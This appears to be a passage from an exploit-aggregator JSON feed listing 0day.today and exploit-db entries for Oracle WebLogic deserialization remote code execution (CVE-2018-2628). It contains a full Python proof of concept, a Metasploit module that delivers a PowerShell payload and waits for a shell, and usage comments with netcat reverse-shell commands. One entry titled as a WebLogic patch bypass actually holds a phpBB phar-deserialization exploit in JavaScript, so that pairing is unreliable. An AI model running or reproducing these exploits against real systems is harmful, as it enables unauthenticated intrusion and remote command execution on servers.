'70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'\r\n payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'\r\n payload << '6f3b290000001b7878fe00ff'\r\n\r\n data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\r\n data << payload\r\n\r\n sock.put([data].pack('H*'))\r\n sleep(1)\r\n sock.put([data].pack('H*'))\r\n sleep(1)\r\n sock.get_once\r\n end\r\n\r\n def exploit\r\n @met_sent = []\r\n gen_resp\r\n\r\n connect\r\n vprint_status('Sending handshake...')\r\n t3_handshake\r\n\r\n build_t3_request_object\r\n\r\n start_service\r\n\r\n vprint_status('Sending payload...')\r\n send_payload_objdata\r\n\r\n # Need to wait this long to make sure we get a shell back\r\n sleep(10)\r\n end\r\nend\n\n# 0day.today [2018-08-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30868"}, {"lastseen": "2019-03-09T04:35:39", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2019-03-08T00:00:00", "title": "Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-3245", "CVE-2018-2628"], "modified": "2019-03-08T00:00:00", "id": "1337DAY-ID-32327", "href": "https://0day.today/exploit/description/32327", "sourceData": "Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) Exploit\r\n\r\n// All greets goes to RIPS Tech\r\n// Run this JS on Attachment Settings ACP page\r\nvar plupload_salt = '';\r\nvar form_token = '';\r\nvar creation_time = '';\r\nvar filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip\r\n// your payload here\r\nvar payload = '<?php __HALT_COMPILER(); 
?>\\x0d\\x0a\\xfe\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x01'+'\\x00'.repeat(5)+'\\xc8\\x01\\x00\\x00O:31:\"GuzzleHttp\\x5cCookie\\x5cFileCookieJar\":4:{s:41:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00filename\";s:30:\"/var/www/html/phpBB3/pinfo.php\";s:52:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00storeSessionCookies\";b:1;s:36:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\x5cCookie\\x5cSetCookie\":1:{s:33:\"\\x00GuzzleHttp\\x5cCookie\\x5cSetCookie\\x00data\";a:3:{s:7:\"Expires\";i:1;s:7:\"Discard\";b:0;s:5:\"Value\";s:17:\"<?php phpinfo();#\";}}}s:39:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00strictMode\";N;}\\x08\\x00\\x00\\x00test.txt\\x04\\x00\\x00\\x00K>\\x10\\x5c\\x04\\x00\\x00\\x00\\x0c~\\x7f\\xd8\\xb6\\x01'+'\\x00'.repeat(6)+'test\\xa0\\x17\\xd2\\xe0R\\xcf \\xf6T\\x1d\\x01X\\x91(\\x9dD]X\\x0b>\\x02\\x00\\x00\\x00GBMB';\r\nvar byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);});\r\nvar sid = (new URL(document.location.href)).searchParams.get('sid');\r\nvar url = '/adm/index.php';\r\nvar getparams = {\r\n 'i': 'acp_database',\r\n 'sid': sid,\r\n 'mode': 'backup'\r\n};\r\n$.get(url, getparams, function(data) {\r\n form_token = $(data).find('[name=\"form_token\"]').val();\r\n creation_time = $(data).find('[name=\"creation_time\"]').val();\r\n if(form_token && creation_time) {\r\n var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download';\r\n var postdata = {\r\n 'type': 'data',\r\n 'method': 'text',\r\n 'where': 'download',\r\n 'table[]': 'phpbb_config',\r\n 'submit': 'Submit',\r\n 'creation_time': creation_time,\r\n 'form_token': form_token\r\n }\r\n $.post(posturl.replace(\"|\", sid), postdata, function (data) {\r\n plupload_salt = data.match(/plupload_salt',\\s*'(\\w{32})/)[1];\r\n if (plupload_salt) {\r\n filepath = filepath.replace(\"$salt\", plupload_salt);\r\n var postdata = new FormData();\r\n postdata.append('name', 
'evil.zip');\r\n postdata.append('chunk', 0);\r\n postdata.append('chunks', 2);\r\n postdata.append('add_file', 'Add the file');\r\n postdata.append('real_filename', 'evil.zip');\r\n // file\r\n var pharfile = new File([byteArray], 'evil.zip');\r\n postdata.append('fileupload', pharfile);\r\n jQuery.ajax({\r\n url: '/posting.php?mode=reply&f=2&t=1',\r\n data: postdata,\r\n cache: false,\r\n contentType: false,\r\n processData: false,\r\n method: 'POST',\r\n success: function(data){\r\n if (\"id\" in data) {\r\n $('#img_imagick').val(filepath).focus();\r\n $('html, body').animate({\r\n scrollTop: ($('#submit').offset().top)\r\n }, 500);\r\n }\r\n }\r\n });\r\n\r\n }\r\n }, 'text');\r\n }\r\n});\n\n# 0day.today [2019-03-09] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/32327"}], "exploitdb": [{"lastseen": "2018-05-24T14:18:42", "description": "Oracle Weblogic Server 10.3.6.0 / 12.1.3.0 / 12.2.1.2 / 12.2.1.3 - Deserialization Remote Command Execution. CVE-2018-2628. Remote exploit for Multiple platform", "published": "2018-04-22T00:00:00", "type": "exploitdb", "title": "Oracle Weblogic Server 10.3.6.0 / 12.1.3.0 / 12.2.1.2 / 12.2.1.3 - Deserialization Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-04-22T00:00:00", "id": "EDB-ID:44553", "href": "https://www.exploit-db.com/exploits/44553/", "sourceData": "# -*- coding: utf-8 -*-\r\n# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)\r\n#\r\n# IMPORTANT: Is provided only for educational or information purposes.\r\n#\r\n# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team\r\n# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA\r\n#\r\n# How to exploit:\r\n# 1. 
run below command on JRMPListener host\r\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\r\n# 2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]\r\n# e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'\r\n# 2. start a listener on attacker host\r\n# e.g. nc -nlvp 4040\r\n# 3. run this script on attacker host\r\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\r\n# 2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]\r\n# e.g.\r\n# a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)\r\n# b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)\r\n\r\nfrom __future__ import print_function\r\n\r\nimport binascii\r\nimport os\r\nimport socket\r\nimport sys\r\nimport time\r\n\r\n\r\ndef generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\r\n #generates ysoserial payload\r\n command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)\r\n print(\"command: \" + command)\r\n os.system(command)\r\n bin_file = open('payload.out','rb').read()\r\n return binascii.hexlify(bin_file)\r\n\r\n\r\ndef t3_handshake(sock, server_addr):\r\n sock.connect(server_addr)\r\n sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))\r\n time.sleep(1)\r\n sock.recv(1024)\r\n print('handshake successful')\r\n\r\n\r\ndef build_t3_request_object(sock, port):\r\n data1 = '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'\r\n data2 = 
'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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))\r\n data3 = '1a7727000d3234322e323134'\r\n data4 = '2e312e32353461863d1d0000000078'\r\n for d in [data1,data2,data3,data4]:\r\n sock.send(d.decode('hex'))\r\n time.sleep(2)\r\n print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))\r\n\r\n\r\ndef send_payload_objdata(sock, data):\r\n payload='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'\r\n payload+=data\r\n payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'\r\n payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)\r\n sock.send(payload.decode('hex'))\r\n time.sleep(2)\r\n sock.send(payload.decode('hex'))\r\n res = ''\r\n try:\r\n while True:\r\n res += sock.recv(4096)\r\n time.sleep(0.1)\r\n except Exception:\r\n pass\r\n return res\r\n\r\n\r\ndef exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.settimeout(65)\r\n server_addr = (dip, dport)\r\n t3_handshake(sock, server_addr)\r\n build_t3_request_object(sock, dport)\r\n payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)\r\n print(\"payload: \" + payload)\r\n rs=send_payload_objdata(sock, payload)\r\n print('response: ' + rs)\r\n print('exploit completed!')\r\n\r\n\r\nif __name__==\"__main__\":\r\n #check for 
args, print usage if incorrect\r\n if len(sys.argv) != 7:\r\n print('\\nUsage:\\nexploit.py [victim ip] [victim port] [path to ysoserial] '\r\n '[JRMPListener ip] [JRMPListener port] [JRMPClient]\\n')\r\n sys.exit()\r\n\r\n dip = sys.argv[1]\r\n dport = int(sys.argv[2])\r\n path_ysoserial = sys.argv[3]\r\n jrmp_listener_ip = sys.argv[4]\r\n jrmp_listener_port = sys.argv[5]\r\n jrmp_client = sys.argv[6]\r\n exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44553/"}, {"lastseen": "2018-08-13T19:27:18", "description": "Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit). CVE-2018-2628. Remote exploit for Windows platform. Tags: Metasploit Framework (...", "published": "2018-08-13T00:00:00", "type": "exploitdb", "title": "Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-08-13T00:00:00", "id": "EDB-ID:45193", "href": "https://www.exploit-db.com/exploits/45193/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/exploit/powershell'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::Remote::TcpServer\r\n include Msf::Exploit::Powershell\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Oracle Weblogic Server Deserialization RCE',\r\n 'Description' => %q{\r\n An unauthenticated attacker with network access to the Oracle Weblogic\r\n Server T3 interface can send a serialized object to the interface to\r\n execute code on vulnerable hosts.\r\n },\r\n 'Author' =>\r\n [\r\n 'brianwrf', # EDB PoC\r\n 'Jacob Robles' # 
Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2018-2628'],\r\n ['EDB', '44553']\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => ['win']\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 7001\r\n },\r\n 'DisclosureDate' => 'Apr 17 2018'))\r\n end\r\n\r\n def gen_resp\r\n pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\r\n pwrshl.gsub!(\"%COMSPEC%\", \"cmd.exe\")\r\n tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join\r\n\r\n mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')\r\n mycmd << tmp_dat\r\n\r\n # Response data taken from JRMPListener generated data:\r\n # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'\r\n # Modified captured network traffic bytes. Patch in command to run\r\n @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'\r\n @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'\r\n @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'\r\n @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'\r\n @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'\r\n @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'\r\n @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'\r\n @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'\r\n @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'\r\n @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'\r\n @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'\r\n @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'\r\n @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'\r\n @resp << 
'6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'\r\n @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'\r\n @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'\r\n @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'\r\n @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'\r\n @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'\r\n @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'\r\n @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'\r\n @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'\r\n @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'\r\n @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'\r\n @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'\r\n @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'\r\n @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'\r\n @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'\r\n @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'\r\n @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'\r\n @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'\r\n @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'\r\n @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'\r\n @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'\r\n @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'\r\n @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'\r\n @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'\r\n @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'\r\n @resp << 
'70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'\r\n @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'\r\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'\r\n @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'\r\n @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'\r\n @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'\r\n @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'\r\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'\r\n @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'\r\n @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'\r\n @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'\r\n @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'\r\n @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'\r\n @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'\r\n @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'\r\n @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'\r\n @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'\r\n @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'\r\n @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'\r\n @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'\r\n @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'\r\n @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'\r\n @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'\r\n @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'\r\n @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'\r\n @resp << 
'7571007e003b00000000740006696e766f6b657571007e003e00000002767200'\r\n @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'\r\n @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'\r\n @resp << '673badd256e7e91d7b470200007078700000000174'\r\n\r\n @resp << mycmd\r\n\r\n @resp << '74'\r\n @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'\r\n @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'\r\n @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'\r\n @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'\r\n @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'\r\n @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'\r\n @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'\r\n @resp << '7e005a'\r\n end\r\n\r\n\r\n def on_client_connect(client)\r\n # Make sure to only sent one meterpreter payload to a host.\r\n # During testing the remote host called back up to 11 times\r\n # (or as long as the server was listening).\r\n vprint_status(\"Comparing host: #{client.peerhost}\")\r\n if @met_sent.include?(client.peerhost) then return end\r\n @met_sent << client.peerhost\r\n\r\n vprint_status(\"met_sent: #{@met_sent}\")\r\n\r\n # Response format determined by watching network traffic\r\n # generated by EDB PoC\r\n accept_conn = '4e00'\r\n raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join\r\n accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')\r\n accept_conn << raccept_conn\r\n accept_conn << '0000'\r\n accept_conn << client.peerport.to_s(16).rjust(4,'0')\r\n\r\n client.put([accept_conn].pack('H*'))\r\n client.put([@resp].pack('H*'))\r\n end\r\n\r\n def t3_handshake\r\n shake = '74332031322e322e310a41533a323535'\r\n shake << '0a484c3a31390a4d533a313030303030'\r\n shake << '30300a0a'\r\n\r\n sock.put([shake].pack('H*'))\r\n sleep(1)\r\n 
sock.get_once\r\n end\r\n\r\n def build_t3_request_object\r\n # data block is from EDB PoC\r\n data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'\r\n data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'\r\n data << '700000000a000000030000000000000006007070707070700000000a00000003'\r\n data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'\r\n data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'\r\n data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'\r\n data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'\r\n data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'\r\n data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'\r\n data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'\r\n data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'\r\n data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'\r\n data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'\r\n data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'\r\n data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'\r\n data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'\r\n data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'\r\n data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'\r\n data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'\r\n data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'\r\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\r\n data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'\r\n data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'\r\n data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'\r\n data << 
'766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'\r\n data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'\r\n data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'\r\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\r\n data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'\r\n data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'\r\n data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'\r\n data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\r\n data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'\r\n data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'\r\n data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'\r\n data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'\r\n data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'\r\n data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'\r\n data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'\r\n data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'\r\n data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'\r\n data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'\r\n data << '2d4147444d565155423154362e656883348cd6000000070000'\r\n\r\n data << rport.to_s(16).rjust(4, '0')\r\n\r\n data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'\r\n data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'\r\n data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'\r\n data << '863d1d0000000078'\r\n\r\n sock.put([data].pack('H*'))\r\n sleep(2)\r\n sock.get_once\r\n end\r\n\r\n def send_payload_objdata\r\n # JRMPClient2 payload generated from EDB PoC:\r\n # python exploit.py <rhost> <rport> 
ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2\r\n # Patch in srvhost and srvport\r\n payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\r\n payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\r\n payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'\r\n payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'\r\n payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'\r\n payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'\r\n payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'\r\n payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'\r\n payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'\r\n payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'\r\n payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'\r\n payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'\r\n payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'\r\n payload << '78707702000078fe010000'\r\n\r\n # Data\r\n payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'\r\n payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'\r\n payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'\r\n payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'\r\n payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'\r\n payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'\r\n payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'\r\n payload << '1e030000787077'\r\n\r\n unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join\r\n unicast_dat = '000a556e696361737452656600'\r\n unicast_dat << (unicast_srvhost.length >> 
1).to_s(16).rjust(2,'0')\r\n unicast_dat << unicast_srvhost\r\n unicast_dat << '0000'\r\n unicast_dat << srvport.to_s(16).rjust(4,'0')\r\n unicast_dat << '000000004e18654b000000000000000000000000000000'\r\n unicast_dat << '78'\r\n\r\n payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')\r\n payload << unicast_dat\r\n\r\n payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'\r\n payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'\r\n payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'\r\n payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'\r\n payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'\r\n payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'\r\n payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'\r\n payload << '6f3b290000001b7878fe00ff'\r\n\r\n data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\r\n data << payload\r\n\r\n sock.put([data].pack('H*'))\r\n sleep(1)\r\n sock.put([data].pack('H*'))\r\n sleep(1)\r\n sock.get_once\r\n end\r\n\r\n def exploit\r\n @met_sent = []\r\n gen_resp\r\n\r\n connect\r\n vprint_status('Sending handshake...')\r\n t3_handshake\r\n\r\n build_t3_request_object\r\n\r\n start_service\r\n\r\n vprint_status('Sending payload...')\r\n send_payload_objdata\r\n\r\n # Need to wait this long to make sure we get a shell back\r\n sleep(10)\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45193/"}, {"lastseen": "2019-03-07T22:40:03", "description": "", "published": "2019-01-03T00:00:00", "type": "exploitdb", "title": "Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-3245", "CVE-2018-2628"], "modified": "2019-01-03T00:00:00", "id": "EDB-ID:46513", "href": 
